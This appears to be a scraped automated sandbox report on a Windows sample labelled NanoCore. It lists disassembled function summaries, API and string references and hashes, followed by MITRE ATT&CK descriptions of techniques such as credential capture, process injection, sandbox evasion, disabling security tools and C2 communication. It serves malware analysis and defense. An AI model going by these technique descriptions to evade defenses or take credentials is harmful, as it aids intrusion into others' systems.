Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_memmove_wcslen
String ID: ComboBox$ListBox
API String ID: 547829025-1403004172
Opcode ID: d42449925e5d73bf5efbcbd839a94f3d8f283fb9d3d1ef86041d212ab68e1e6f
Instruction ID: 9caa11923e78b0eb683048b234d239b43c4bc5096a3f24253976785a79955a9e
Opcode Fuzzy Hash: d42449925e5d73bf5efbcbd839a94f3d8f283fb9d3d1ef86041d212ab68e1e6f
Instruction Fuzzy Hash: 4601847161115967CF10BAAD9C46BDAB75CFB96320F048067FA58D7242C925994883E1

Uniqueness

Uniqueness Score: -1.00%

Function 00862175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00862192
__fread_nolock.LIBCMT ref: 008621A8

Strings

EA06, xrefs: 008621DB

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: df2e5cbd3243c90b206ef8465d6f49c9c82c306793d7cb7101924eaa09589a46
Instruction ID: 6ac50d76b63f39f84238dc7468458a08830f30606a0f52b46874125cc57e2b46
Opcode Fuzzy Hash: df2e5cbd3243c90b206ef8465d6f49c9c82c306793d7cb7101924eaa09589a46
Instruction Fuzzy Hash: 0901F931D042186BCB18DB9C8C56BEEBBF8EF55301F048599F596D2281D574A618CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00886069, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001001,00000000,?), ref: 00886075

Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511

wsprintfW.USER32 ref: 008860A1

Strings

%d/%02d/%02d, xrefs: 0088609B

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend_mallocwsprintf
String ID: %d/%02d/%02d
API String ID: 1262938277-328681919
Opcode ID: 706a4dbba050bb4cd737c5b1fa43fa3cf38a85cde8f9b255d384548e38eab93f
Instruction ID: f6ec11653f8d28610c6645433b62f6fa3daa9b632c617a13f44e7e56b927d84d
Opcode Fuzzy Hash: 706a4dbba050bb4cd737c5b1fa43fa3cf38a85cde8f9b255d384548e38eab93f
Instruction Fuzzy Hash: 45F0A77274022866D7109BD9AC46FFEB3E8FB59B13F000267FA04E91C0D6694850C3F1

Uniqueness

Uniqueness Score: -1.00%

Function 0086704A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00867058

Part of subcall function 008417FA: _doexit.LIBCMT ref: 00841806

Strings

Error allocating memory., xrefs: 00867051
AutoIt, xrefs: 0086704C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 0466863505c9bcb1f31f058dc1ed2f738085cac082c834bf3def1ecd5e93303d
Instruction ID: e2682a6bf0aa9e86b6df6c3abaa7ef441837f7736b43997213cde01f0e9269a2
Opcode Fuzzy Hash: 0466863505c9bcb1f31f058dc1ed2f738085cac082c834bf3def1ecd5e93303d
Instruction Fuzzy Hash: D8B092303C031826E54426A00D0BF862200B714F2AF001400B32AA83D304C5449002B2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report YdACOWCggQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Function 001ACBB8, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199
filesleeptimeCOMMON

Function 001A963A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92
memorywindowCOMMON

Function 0019A2DF, Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Function 001B6AF3, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 001983C0, Relevance: 3.9, APIs: 2, Instructions: 940
COMMONCrypto

Function 001AE643, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 001A626D, Relevance: .3, Instructions: 325
COMMONCrypto

Function 001AA5D1, Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724
COMMON

Function 0019FD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Function 001AB4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
windowfileCOMMON

Function 0019CFD0, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 557
COMMON

Function 001AC190, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Function 001AC431, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Function 001B95A5, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Function 00199768, Relevance: 7.6, APIs: 5, Instructions: 116
filetimeCOMMON

Function 001AA388, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Function 001A9A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Function 001A9AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Function 0019964A, Relevance: 6.1, APIs: 4, Instructions: 57
fileCOMMON

Function 001B9A2C, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Function 001A04F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Function 00199C34, Relevance: 4.6, APIs: 3, Instructions: 96
fileCOMMON

Function 00199EF2, Relevance: 4.6, APIs: 3, Instructions: 56
COMMON

Function 0019399D, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176
COMMON

Function 001BA51E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 00191D61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Function 001B9C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Function 001B9C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre